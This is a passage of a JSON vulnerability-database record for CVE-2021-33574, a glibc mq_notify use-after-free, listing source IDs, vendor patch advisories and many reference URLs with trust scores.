{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164967",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165129",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165002",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "VULMON",
"id": "CVE-2021-33574"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"id": "VAR-202105-1306",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:22:11.321000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian CVElist Bug Report Logs: glibc: CVE-2021-33574: mq_notify does not handle separately allocated thread attributes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=7a9966ec919351d3328669aa69ea5e39"
},
{
"title": "Red Hat: CVE-2021-33574",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-33574"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1736",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1736"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-33574 log"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless 1.20.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220434 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift distributed tracing 2.1.0 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220318 - Security Advisory"
},
{
"title": "Red Hat: Important: Release of containers for OSP 16.2 director operator tech preview",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220842 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220580 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.2.11 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220856 - Security Advisory"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-33574 "
},
{
"title": "CVE-2021-33574",
"trust": 0.1,
"url": "https://github.com/JamesGeee/CVE-2021-33574 "
},
{
"title": "cks-notes",
"trust": 0.1,
"url": "https://github.com/ruzickap/cks-notes "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-38604 "
},
{
"title": "ochacafe-s5-3",
"trust": 0.1,
"url": "https://github.com/oracle-japan/ochacafe-s5-3 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-33574"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-416",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210629-0005/"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202107-07"
},
{
"trust": 1.7,
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896"
},
{
"trust": 1.7,
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kjyyimddyohtp2porlabtohyqyyrezdd/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rbuuwugxvilqxvweou7n42ichpjnaeup/"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.9,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rbuuwugxvilqxvweou7n42ichpjnaeup/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/kjyyimddyohtp2porlabtohyqyyrezdd/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0245"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6526524"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1071"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4019"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3398"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165862/red-hat-security-advisory-2022-0434-05.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5140"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/glibc-use-after-free-via-mq-notify-35692"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3336"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3214"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0716"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021092807"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0394"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0493"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3935"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164863/red-hat-security-advisory-2021-4358-03.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4229"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4059"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166051/red-hat-security-advisory-2022-0580-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021070604"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021100416"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3785"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165758/red-hat-security-advisory-2022-0318-06.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4095"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4172"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163406/gentoo-linux-security-advisory-202107-07.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166308/red-hat-security-advisory-2022-0842-01.html"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.5,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44228"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5128"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21409"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4358"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0580"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24348"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44790"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23133"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3573"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26141"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27777"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26147"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36386"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24587"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26144"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33033"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3487"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36312"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31829"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31440"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3564"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28971"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26139"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3679"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24588"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36158"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24504"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33194"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3348"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24503"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20284"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29646"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26143"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29368"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20194"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3659"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29660"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26140"
},
